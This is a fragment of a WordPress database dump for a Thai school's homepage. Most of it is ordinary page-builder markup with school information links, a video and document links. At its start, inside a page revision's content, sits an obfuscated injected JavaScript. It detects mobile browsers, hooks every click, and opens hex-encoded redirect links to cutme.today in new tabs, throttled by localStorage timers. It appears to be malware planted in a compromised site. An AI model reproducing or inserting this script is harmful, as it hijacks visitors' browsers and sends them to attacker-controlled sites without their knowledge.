_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 08:57:10','2024-08-28 01:57:10','',19,'http://watprato.ssk.in.th/?p=231',0,'revision','',0),
(232,2,'2024-08-28 09:17:49','2024-08-28 02:17:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" 